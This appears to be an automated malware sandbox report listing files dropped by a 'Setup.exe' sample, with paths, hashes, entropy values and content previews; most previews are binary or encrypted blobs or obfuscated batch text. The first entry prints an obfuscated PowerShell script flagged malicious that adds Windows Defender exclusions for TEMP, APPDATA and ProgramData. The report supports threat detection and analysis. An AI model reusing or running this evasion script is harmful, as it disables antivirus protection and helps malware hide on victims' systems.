                                                                                                                                C:\Users\user\AppData\Local\Temp\GWXV5ZWRBDHT2N15VSQM3K80X.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\189943\Attachment.com
                                                                                                                                File Type:ASCII text, with very long lines (619), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):619
                                                                                                                                Entropy (8bit):5.708869778857825
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:z/ubfzLgyaI4vY8lRzLgyaI4HYF+SLknpHi3t1O+FrAcZYWnefxo0zLgyaIS1+/:z/uLzLCQezLCHYdLknxMt17AqYWefxnN
                                                                                                                                MD5:909DABB4B6591DDCBE2DF0395650DCCA
                                                                                                                                SHA1:51FDEF10C5AADD9DA387464A016223CE1FEF0F1D
                                                                                                                                SHA-256:2A29C9904D1860EA3177DA7553C8B1BF1944566E5BC1E71340D9E0FF079F0BD3
                                                                                                                                SHA-512:E97C71230052E8E24AFA4E0030E45D3CC3473ABECEB1B08BD2C1C8CEFC0F97A7591F831C5E1A82F2E8836BAC6FD06EFBA8314AECD539ACB1CA06C46893793323
                                                                                                                                Malicious:true
                                                                                                                                Preview:$m3x8yk2j5q7="Add-MpPreference -ExclusionPath ";$a1k9zs7d6fh=[System.Text.Encoding]::ASCII.GetBytes("UniqueString1");$w2fh6zk3l9jy=($m3x8yk2j5q7+"'$env:TEMP'");$p9lk7zd5j3x=[System.Text.Encoding]::ASCII.GetString($a1k9zs7d6fh);$v4jk8x7l2fh=($m3x8yk2j5q7+"'$env:APPDATA'");$b0zl6kj8x3d=New-Object System.Text.ASCIIEncoding;$x5jh9y2k7zl=($m3x8yk2j5q7+"'C:\ProgramData'");$n7fh5x2j8lk=$b0zl6kj8x3d.GetBytes("UniqueString2");iex $w2fh6zk3l9jy;iex $v4jk8x7l2fh;iex $x5jh9y2k7zl;$j3yk9zl7f5h=[System.Diagnostics.Process]::GetCurrentProcess().CloseMainWindow();$c6zk8fj2yl9=[System.Text.Encoding]::UTF8.GetString($n7fh5x2j8lk)

                                                                                                                                C:\Users\user\AppData\Local\Temp\Handbook

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):56320
                                                                                                                                Entropy (8bit):7.996612787004311
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:1536:gm/+5eJWMpylKpVKOnkHIqXQUOuHN0H2SkB+fIpVvMd:j/AGoOkHIqgUOuHckB+gnEd
                                                                                                                                MD5:9018123D42AD63F895753647D84BCB5B
                                                                                                                                SHA1:8EB549DAB06BB97A1AE592A183D85B51DA188785
                                                                                                                                SHA-256:20937AD26ED7FCB8CB671B3E321D8F3370B949AC8C49310DF35C0642B1DFC866
                                                                                                                                SHA-512:F1D399994CE2A8E4CC283B17E2CB2B9D666A101169D3BD0C5C98265FB0C5FD4227BD4F624D877795537BD4C0E7F0FB86C60BA88F791D8A2123C4C66A62C0EA8B
                                                                                                                                Malicious:false
                                                                                                                                Preview:.,...B.Yh1..L.~...>.C.3)....}..d....`%.&N.x.%.?jH.7u......+.H..L..P...U...R%Qq....}.z\v.5.!....i,.=D..;.hy....|.s.$%.bq.K..u.P:..$o.=..A...1.!.bP8;.DZ...q.O#.)....l.../...R........w...|R...|..:.xo.......n.Ls.....n...]..]C....+lf..txc/.....~.j.ia?....+..VZ2W. ..r.(`.. ....s...`...t.b...V..v..$@.4.~4.f.@.}<..94.!.._...-.j.... ...O@....Z.....<.0..c...C.oC..C..Q...,%...|....f....kQ.....rS?..F(..R....K...K.....LF..OO.t.v....+Hm...........K..........*ts&.,....Q=2..M.F..*...M.`.zj......*i..A....X:.I.I..=IV>...zwD.. C..?#P/u..wDP.ud.. ....<W<.-..G..w....].........t..J............W~=...g..&.. .\]......lmk..8!v4...Ra.......e..q.f.H#IZ.Z..l^g/.&...p....8..N.S....-.7[..P.X..~e.s....k.o......|.N.]....n......U..7...e...&.2.Fp.Z_!e..TRuI.5..1.DvDl?".T9X..Y.dC...4M7...M.v..4.2..+_.=).U:...g\.9.2...vb...S.iil.';..Uz..<../.}.G.......X.uh.3..F..+....t*.2.(..X.~kO..<N...5....N.....aP..o..2Ly...R.uN...O...k4.J>.4.."....1..b..k....:/..b...:.L.E>,.5..Y.....R<V.=fd....

                                                                                                                                C:\Users\user\AppData\Local\Temp\Hart

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):94946
                                                                                                                                Entropy (8bit):6.5800415446232075
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:dLTN3EfrDWyu0uZo2+9BBVgCOa1ZBPaPQaEwo0yv:dLTNaWy4ZNoBVxjCPjojv
                                                                                                                                MD5:38ABEC7193135003D8EC76408D9DC519
                                                                                                                                SHA1:2799A9E52F191E769D60BACF855A23CE7671095B
                                                                                                                                SHA-256:9FB4A3306F1EB8252D37F46FEE23E511976EB18FBB589AAFCCA0EBFA7F7DE1E3
                                                                                                                                SHA-512:0DFF018966D91B72A9F89DB86CFE9A55C110DC2DFAE9BB07280452FC3C1ADF303CB37AAC361EAC039EF699944D82A41D6A2BC477AA0C26219C74B2EE66CD6E5D
                                                                                                                                Malicious:false
                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Loop

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):88064
                                                                                                                                Entropy (8bit):7.997910356469845
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:1536:nu4jib0ngrKOr62dLyWrFMcx2jxd10x8LeEa75pZVXKdPCxIwex10GgW2PvWqxGo:n4b04rrRecktH0Rp5rVgwex3iGo
                                                                                                                                MD5:6C94DFC9CACE833D232F028CD957B411
                                                                                                                                SHA1:6A1F7DC692F3EE41CF925C8558EB8EDF951ED7BE
                                                                                                                                SHA-256:176D491408DCF92F287851E0B08507ED38E8937611C167F85D470DD5A614FE73
                                                                                                                                SHA-512:37542A0F73414E583750CCC8E470232CA3C65DFB87A9CAED27528309E186F43F078BBD9B8E6653A5794A168A29879EC765C7563915E858CA066ADB03D67993C4
                                                                                                                                Malicious:false
                                                                                                                                Preview:f....a.HxA....*......K..J..}.X.....W......k..R..).a..t..m.u.Gt....;.lw....3E...%.I.D..Nl...i.Vo......].(.G%\u...==.(s.:.......-.!;.z..c....@....q....2.....S.......E.%l>.bb......G.<I..^..MW2.2!&W.w/....U..}...5|-..<.u.EY#oN....C...2..,...]`..|x.S....h.Js<..]......W.!Y......C.Fh.d........A..e....1.n....c.*:.&.B.........ZR...... ........U...%].a......!R8.d...O......3.#....r..A.....gkT.*.f.Q. B.....!5....0'.HgH..."...?d..=.o[...Q.f......s..8.\./.....YMa.@...3..(..N.....eVa.8.IJ...#.:>.n0.BN(.r_.......?..%h.I@... ..........T..#..u4.|.KxU.5>.....w.wE..v.D.).v...!)..wYD.o...z.=..>...o....GR.tm....O..9..........x.vp./I?....:...S....gn..~...Li.c..>|..cC..c..'x...:~.Q..O.+..4..0....$........i...b. .v.r.....@...h......&pF.-.h...4.R.....Po.2~.kI.#...#...a...x]Of[.Vu.f.}......H....F..R......WX..`u....v9).t.....@.y.....$.0.T-o?.RS..L.N.....m...cI.@....".0.~.`..a)......&.8.....tb..P".w.=^..L.h.N../N=..JS.O._....5,4sT.'..B....Q2.....K..%...........Q....

                                                                                                                                C:\Users\user\AppData\Local\Temp\Metro

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):146432
                                                                                                                                Entropy (8bit):6.537936237283588
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:mfaBaGdDqeb2Xo2IkVvh8p65Nu+dVtqi/x4Rqf21Rgat0g/u:mfcaG9b2M8JTDD/xcq21R1p/u
                                                                                                                                MD5:BDAEE98A6902E6C461F7431C804811E8
                                                                                                                                SHA1:36DF614AA9347CE434F09C542351BBD898F662FA
                                                                                                                                SHA-256:09DD115F3F98DF429761C656CA30F9EDFBE221AA7678E74B5073F3DFF75741B9
                                                                                                                                SHA-512:106EE96351A77021EB8BF175028146563DC2E0EDC31B67ACD7F59C90C489100D109060257974331FD5F3DAB4B696A1231647749DB798EB575255C0D52266A7E8
                                                                                                                                Malicious:false
                                                                                                                                Preview:^]...U..VW.}.....Q..A...t..B...t..P.;.u...;N.u..V.Q.b...'..N._^]...U...M.u..}..t..u.j.hg....u.....I.3.]...U.......1s...E.P......Ph.....u...`.I...../...S......P......h0.K.P.O.........P.......f..]....\u.f..]....:t.3.f..]....W3.W.u... .I...u.8E.......Wh.. .j.WWh...@.u.....I............h..........j.P.................f...............f............h....P......P..........M....3...f.........RQRR...P......Ph....W..P.I.W..u...X.I..u...$.I.3.....X.I.3.@_[..]...U......4SVW.}..G..0......N..A....D$4.A..D$8.A..D$<.\$0...G..p....Z....N....D$..A..D$..A..D$..A..L$..D$....p...t$..t$.....I....K..L$...b.....K...t.V.L$...m.....K..L$...b....u...L$...b..........S....I..........h..K..L$$.o...D$0P.L$$.Zm..h .K..L$$.ln...=..I.3.SSS.t$,...uchX.K..L$$.jm...D$.P.L$$..m..ht.K..L$$.-n..SSS.t$,...t..u........F.......h..K..L$$. m..SSS.t$,.....u.......F........L$ .q.....u.......&..F......L$..oq...L$0.fq.._^3.[..]...U..QS.].VW.E...{..r..C..H......t..E...C..p.......F..8.C..0......F....u.....

                                                                                                                                C:\Users\user\AppData\Local\Temp\Nevertheless

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                File Type:ASCII text, with very long lines (642), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):19686
                                                                                                                                Entropy (8bit):5.138317971314625
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:w+t0qxYqPkLyqOYv/CmIElaxerAOFllq+F1coHQpYPb:1tJxJkLyJKlvrAO3coQA
                                                                                                                                MD5:7A79F8EA9FEA5EFE8EB91A0D9D1C6935
                                                                                                                                SHA1:DCB90050BA9EA891AF881AF8968439113DA1E178
                                                                                                                                SHA-256:9300644CB48494B3C42CA97834E54E3A3EF00F2C9CA7037B9CE1CDFE60930CFB
                                                                                                                                SHA-512:C6FB7EB94755A9FB5558E9999178701229F6BB12413C6D6AFFDBB55616E78D3BF635F149B89147370D01AB66EF1F7F704744249F71EDEDE0CC26F7CD4DE9B3A8
                                                                                                                                Malicious:false
                                                                                                                                Preview:Set Watson=b..qpuXExperiences-Moses-Devon-Consistent-Hit-Television-..eFNest-Stereo-Herbal-Id-Business-Metallic-Packet-Mature-..fKRwPoint-References-Karaoke-Meetings-Tcp-Warren-Houses-Fastest-..vkEdRespond-..FUzzMerchants-Proposal-..jhzGPins-Virginia-Killed-Memorabilia-..BJxCollapse-Parcel-Hack-Disclaimers-Willing-..Set Nomination=h..sNHProtected-Substantially-Durham-Influences-Vegetation-..vCEVariables-Gazette-Virgin-Henderson-Lead-..xIMet-Broadway-Present-..IvFDStriking-Rope-Sentence-Narrative-Cms-Emma-..NRsFacilitate-Religions-Youth-..gIFSir-..keJmGamecube-..Set Bl=l..pvTSaying-Wonderful-Humans-Charity-Pattern-African-Beneath-..PIoSpatial-..NoIng-Just-..ARSwingers-Poland-Investigation-Pope-Used-Stripes-..ghQAcre-..evToHon-Ill-Goals-Calvin-Clouds-Based-..qhRaises-Vessel-..Set Need=a..USruStrings-Milfs-Italian-Settlement-Ghana-Mine-..BCxAna-Penalties-Chicago-..TebCross-Keyword-Empirical-Tell-Lm-..XqhQCharge-Announcement-Revisions-..MaYTDad-Tiles-Women-Analysts-Tri-Habits-..sipqHandle-

                                                                                                                                C:\Users\user\AppData\Local\Temp\Nevertheless.cmd

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                File Type:ASCII text, with very long lines (642), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):19686
                                                                                                                                Entropy (8bit):5.138317971314625
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:w+t0qxYqPkLyqOYv/CmIElaxerAOFllq+F1coHQpYPb:1tJxJkLyJKlvrAO3coQA
                                                                                                                                MD5:7A79F8EA9FEA5EFE8EB91A0D9D1C6935
                                                                                                                                SHA1:DCB90050BA9EA891AF881AF8968439113DA1E178
                                                                                                                                SHA-256:9300644CB48494B3C42CA97834E54E3A3EF00F2C9CA7037B9CE1CDFE60930CFB
                                                                                                                                SHA-512:C6FB7EB94755A9FB5558E9999178701229F6BB12413C6D6AFFDBB55616E78D3BF635F149B89147370D01AB66EF1F7F704744249F71EDEDE0CC26F7CD4DE9B3A8
                                                                                                                                Malicious:false
                                                                                                                                Preview:Set Watson=b..qpuXExperiences-Moses-Devon-Consistent-Hit-Television-..eFNest-Stereo-Herbal-Id-Business-Metallic-Packet-Mature-..fKRwPoint-References-Karaoke-Meetings-Tcp-Warren-Houses-Fastest-..vkEdRespond-..FUzzMerchants-Proposal-..jhzGPins-Virginia-Killed-Memorabilia-..BJxCollapse-Parcel-Hack-Disclaimers-Willing-..Set Nomination=h..sNHProtected-Substantially-Durham-Influences-Vegetation-..vCEVariables-Gazette-Virgin-Henderson-Lead-..xIMet-Broadway-Present-..IvFDStriking-Rope-Sentence-Narrative-Cms-Emma-..NRsFacilitate-Religions-Youth-..gIFSir-..keJmGamecube-..Set Bl=l..pvTSaying-Wonderful-Humans-Charity-Pattern-African-Beneath-..PIoSpatial-..NoIng-Just-..ARSwingers-Poland-Investigation-Pope-Used-Stripes-..ghQAcre-..evToHon-Ill-Goals-Calvin-Clouds-Based-..qhRaises-Vessel-..Set Need=a..USruStrings-Milfs-Italian-Settlement-Ghana-Mine-..BCxAna-Penalties-Chicago-..TebCross-Keyword-Empirical-Tell-Lm-..XqhQCharge-Announcement-Revisions-..MaYTDad-Tiles-Women-Analysts-Tri-Habits-..sipqHandle-

                                                                                                                                C:\Users\user\AppData\Local\Temp\Objectives

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):57344
                                                                                                                                Entropy (8bit):7.996759945164135
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:1536:FFgvaFKpAe5iXqzL7cifwRrqlmIQYG93T9mxglo:F8liXs75fEMhG93T9Jo
                                                                                                                                MD5:D798297C0E4FC23B579A13BACFE3D820
                                                                                                                                SHA1:2AFD7D90016EBB115333EB64BB59FAD4B86746DD
                                                                                                                                SHA-256:B27CF86E9C078A2EC6CAD30D10935BA2F91FA4D523FF383F442600BE62E5F89B
                                                                                                                                SHA-512:3E3EDB067A07AA7572537407352704633F332967DCCCB26D00CBBA506457E067786C9BAC58D86E4FE9B5A6BCE035FDE9D9B2D52F44D0F0D87890FD2FA19F53E6
                                                                                                                                Malicious:false
                                                                                                                                Preview:..D38q...$.Y.6.r...E.(.!RD. .......I.D..T.......N.f.........3x..T..-.L.(..'.1{.b.Jj.p.%..#?.YX.w*...P.s<......p..!..VQ.L..=}nT{}..jT2...;.;.S....nJ.`....>KL}.r....u..z...b..z....../2a..$9.I...qt...P....g....%...M..+28...`....._.........P..%.p...U*..X..;.@..........{....\.mA..t..bK'.#(%....U.5h...S...z.......6_.O.l:.7...r._...W..v..g1x.....Y.1Nr.c.fe/tv`.|......U.....IO.i.:.-\|.p.<.f.YQH.#,./.8...^=.....$"...*_.o.jYz&u.4....C..\..k......FK8.....+..^b...HG.d..s_D.3IN ...}....QtR..J..5s.9.i..bQ.......,.~........l~.........q....EB....AJy.u)Q8......?v.M...vj.[..`;f.3w.h>.8...t..u...3..,z'...rL.{.1s...i.XFph....../.l50Y..m$3.p.....+.....@q ...y&dYI[.I.<e.....F...|..[...._.%..\n|.-H._K.\..8`........K.<.S..}z&...1.<r.Ipm.<.....P..P.@...h.A.v..e\.wY....[..[C..........o.Dz...hT.g....A:i.k..yU......T....p...B.F.<].....&,....h.....L.<..L..g..\...p...`L......;.>l..3F$..a..r.[.*Y.R...`.W.....F...'"s9KAI.Q..:.......v.|x..S...y6i...J..G4.. .+.....s...

                                                                                                                                C:\Users\user\AppData\Local\Temp\Philosophy

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                File Type:DOS executable (COM)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):119808
                                                                                                                                Entropy (8bit):6.678227167119742
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:a7KxQefixl2vqWWGlHHvpKa5Gk6/vij4Ng/Pp5q/qw0j8sgyZpQ4VMEPmfP/b/po:dxQeixApVIa0/vidXqGjLPQ6ClA/
                                                                                                                                MD5:48919117C45388AEEFB17226C73BDC15
                                                                                                                                SHA1:16191DD94155B081BA6B3E21B7F4D89213AB5041
                                                                                                                                SHA-256:EF8766A677B8BD9A9883DEA377C45774D54792C42581E6A22057A34070AC3547
                                                                                                                                SHA-512:B564477268D9E858CB8F0802E22CF516807FF8D00B7C5338DFFDF5F91513FBC3E5FCA16CE7852AA023B2A91D6060100A2A6880B8BD3462262C38033D6E12E50F
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:.I...-...X.f...0.I...\.f.(. .I...Y.f.....v........?f.(-..I.....I......f.Y...\...Y.8.I...\.f..x.f.........\.f.Y.f.\.f.(5..I...Y...\.f.Y.f.Y...\.f.(...\.f..X...X...\...Y.f.Y...Y.f.Y.f.Y.f.X-..I...Y f.X5..I.f.Y.......XX...Y.......X.f.X.f..h...\...\...XH.f.Y...X...X...X...X...X.f.....X.....X.f..d$..D$......+f....f%..f.......f...`.I...\.f..L$..D$......2...I.....U.........$..~.$.......f..D$.f....f%..f-00f=....B...f.....I...Y.f.....I...-...X.f.....I...\.f.(...I...Y.f.....v........?f.(-..I.....I......f.Y...\...Y...I...\.f..x.f.........\.f.Y.f.\.f.(5..I...Y...\.f.Y.f.Y...\.f.(...\.f..X...X...\...Y.f.Y...Y.f.Y.f.Y.f.X-..I...Y f.X5..I.f.Y.......XX...Y.......X.f.X.f..h...\...\...XH.f.Y...X...X...X...X...X.f.....X.....X.f..d$..D$......I...f...f=..u...Y...I.f..D$..D$.....f.....I...Y...\...Y...I.f..D$..D$.......1...U...(3..E..E.9..ZL.t..5.aL...8.I.......|C..E......V;............................j.Z+.......H...............H...............HtN.....#....E......E.PI..E..u....E..]....E..]...P.]...Y.

                                                                                                                                C:\Users\user\AppData\Local\Temp\Surrounded

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):70656
                                                                                                                                Entropy (8bit):4.288369736827085
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:2+AGWBA60iPTcf4qSq25N8EH/i6mxyyM0Dj2Bmgari07L:2+l6JPTcUNx6/xhgariw
                                                                                                                                MD5:61F46E587DDE8EBFB33BAA67C373C4CC
                                                                                                                                SHA1:5FBA56CF088926FF10415D22542ED1DBBB064B1C
                                                                                                                                SHA-256:349302733ADA7595C70F0C83A1E2CB1C027C533871AF5BC0BE6466D17EC3EDEA
                                                                                                                                SHA-512:5A9E35C87BFF33A809091D5C142DBDB6D62E079F1ADD97B2894BBF1973755CB2B2B62C9053648BA991C0E8B53F8CF151A85E18C68A87300A0CE5A9596C017110
                                                                                                                                Malicious:false
                                                                                                                                Preview:....................................................................................................................................................................................................................r.r.................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.........r.......................................................r.....r...r.r...r.....................r.........r...r...r.r.r.r.r.r...r.r.r.r...r...r...r.......r.....r...r.r...r...r...r...r...r.....r...r.r.........r...............r.........r.........r...r.....................r...................................r.r.r.r.r.......r...........r...................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.....r.r.r.r.r.r.r.r.r.r.r.r.r.r.........................................................................................r.r.r.r...............................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Technological

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):148480
                                                                                                                                Entropy (8bit):5.8765840511418554
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:p4ztrgWVrZ+In23SwFc1vtmgMbFuPO1MBNfMBNB+usWjcdGQuklIusaAwu9hPy:CZaUAg0FuPOKBNEBNUGXEyaAt7Py
                                                                                                                                MD5:83F7F1CA3C232B7C1B88BF316704F0CA
                                                                                                                                SHA1:3E9E30D140FF02905D825348FC13E8B6E8448DCE
                                                                                                                                SHA-256:A92634171552924D4A1C4D32F5B227C20000458BFCB46CAEAC1DDA46B3B92B10
                                                                                                                                SHA-512:D9AF7F1624CCA4F661FBB765ACF7484D6B03F08030C7AC4BB07380DFC6DDA19E49F6A90362ADAD4F3B4AC15C9240892E529D7074D5CB2312BFE38FC91030A7C6
                                                                                                                                Malicious:false
                                                                                                                                Preview:..auA..A.f;E.t.f;E.....A.j.^f;.t.j.^f;.u........-....t.HHt.HHu...A...A... gJ...A..t9.B..7w1f.A......f#.....f;.u........A.;E.t"...... gJ...A..1f........3._^[..]....U..QQSV.u.3.U..M......sAW3.;E.t+.V..H...G.R.A9.t..4..U..M.P.u..u..l........4.........r._^..[..].U..QQS.].3.VW...U..E..w,9G0~X...P.F.P.u..1.......u.f9D^.t......x..G4.4F.E.@;G0.E....|....G0+E..O4.....P..NVP.......f.E.f.....P.u..F.P..+.....3.f.D^..G0_^[..].U..QQSV.u.3.W.}..........U..M...t]HPS.u..u...........H.B......@.N.9.t.F..E......u.......%.....U.H.M.P..@P.u..u..:....u..........r._^..[..].U..V.r....W...........KK.........E.hJ......]....$...H....!?J.<.t.<.t.<.t.3...3.A3.;M.....1.......!?J.3.E.;..p.K....3.;U.......!?J.3.9E.......... ?J.......!?J.3.B...p.K.;.t...t.3......;.w=ts...r"...vi.. td......t\......tT......tL....!?J.3.<.p.K..... ..r... ..v(..' ..v..) ..v.../ ..t..._ ..t....0..u..E..U....!?J.3.B...p.K.;...!.............._.L.......#?J.....UJ....@.;.t...;.s.3.9E......3._^]..3.H.Z.H.x.H...H...H...H...H.6

                                                                                                                                C:\Users\user\AppData\Local\Temp\Underwear

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):73728
                                                                                                                                Entropy (8bit):6.6706516345081734
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:Dsu0nMOKzlvlao/RIs2ziQD2tR/i0027EM/awuUwh:kDKJtIs8di/37EM/jU
                                                                                                                                MD5:8F60967D491451F4A2C404FFDEE58E4B
                                                                                                                                SHA1:4191F5F3FDA749234D8606771C2D06D616CF9898
                                                                                                                                SHA-256:ADC5906E287A682626896B2E9E7F2A6F3E34F3F5F0FA3601C12473CDB9274BEF
                                                                                                                                SHA-512:69BB6484EB048D5529D7C6051ECD921A2237F5AA3DA59FB88A3D4CC79A0528C6E860762B1F383066B023D439A138D55933261980E3723F52B85716AE3FE3EE03
                                                                                                                                Malicious:false
                                                                                                                                Preview:$.^_......F..G..D$.^_.I......F..G..F..G..D$.^_..t1..|9.......u$.........r.....$.D.B......$...B..I..........r....+..$.H.B..$.D.B..X.B.|.B...B..F.#.G.............r.....$.D.B..I..F.#.G..F.....G..........r.....$.D.B...F.#.G..F..G..F.....G............V.......$.D.B..I...B...B...B...B...B. .B.(.B.;.B..D...D...D...D...D...D...D...D...D...D...D...D...D...D..............$.D.B...T.B.\.B.l.B...B..D$.^_..F..G..D$.^_.I..F..G..F..G..D$.^_..F..G..F..G..F..G..D$.^_..$....W...................te..$.....f.o.f.oN.f.oV f.o^0f...f..O.f..W f.._0f.of@f.onPf.ov`f.o~pf..g@f..oPf..w`f...p............Ju...tO.......t.......f.o.f....v....Ju...t*.....t......v....Iu....t.....FGIu.......X^_..$.............+.+.Q.....t.....FGIu....t......v....Hu.Y.....U..S.]...V.........H......H......H..>....U.H.......u.W.. ........;.............+.t.3.......M..............~...B.+.t.3.......M........y.....~...B.+.t.3.......M........W.....N...B.+.t.3........E......3....1....F.;B.t......B.+.t........M............

                                                                                                                                C:\Users\user\AppData\Local\Temp\Worcester

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):6.697289890226587
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:0fA4lelIJBSLPNGR5yiPlcQ4NvoWV7a5ouYNqnLzB:0fA+eyVPlcBgtoTqnvB
                                                                                                                                MD5:48726711D1F4FE7A0BB6076B17F02A55
                                                                                                                                SHA1:6C2F38EA9C6AD28111EB824915402BCF85453A96
                                                                                                                                SHA-256:D510A287CDE9E0F394BA3C0C0A1A1B49252CB82EF27664CF6FE33891DCB43700
                                                                                                                                SHA-512:B24EBDE3BEE37F7D9093D8CEC53002F8D2BCDD6D623DF7FFDBDD2619750F0DAD8B4876DDCDC928D7BAFED6B6B607CD5581768F9C1A1075E60886F66255B11DA8
                                                                                                                                Malicious:false
                                                                                                                                Preview:.;...*@....82..@..?..B@..Ju.M...@..j.X.@...x.....@...x....y@....}....t........@...=.....@...L..:L..uF.L..:..u5.L..:L..u#.L..:L..u..........A....A.......A.......A.......@..@..@...E.....j...P.3..A...3.E..j.j.P..B...}.EA06t........@..3...@.....mA...M...B..3.@.UA...6.E.j.j.P..A..h...j..E.P.....6.f.....pA...F.3...A...A..U.Rj.j...j.P.Q..E..cA...I..E.VW.1.}.W.u..RPQ.V..E._^.gA...I..E.P.E...E...P.u.Q.R..E..sA.....t4HHt.......D....sL....rL........D...5.rL.....I...D...M...j....P...Pj.j..5.rL.....I..D...E...sL.%.......rL...........prL..w.........%D...=.rL.....D....xL....P.....O....D...=.rL.....C...E.P.$~....C...u..u.QQ..xL.."..<....D....C...E....rL..P.M.N.TK...}..HE...E....rL..P.M.N.8K...}..AE....rL....rL........rL...(....E.P.M...K...E..rL.P......E....P.M...J...}...E...E....rL.....P.M...J...E..rL.P.....E....P.M..J....D..j.QQ.BT......F..j.h..K.h.K.S..8.I..3H..j..5.rL...W..&....rL....L..G.....&........P....I..=|rL...G...C.......G..8E....G...M..:...h.mK..M......M..t%...K.

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1frnybdi.30m.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4gbgi4m.4cb.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkxmew01.oma.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
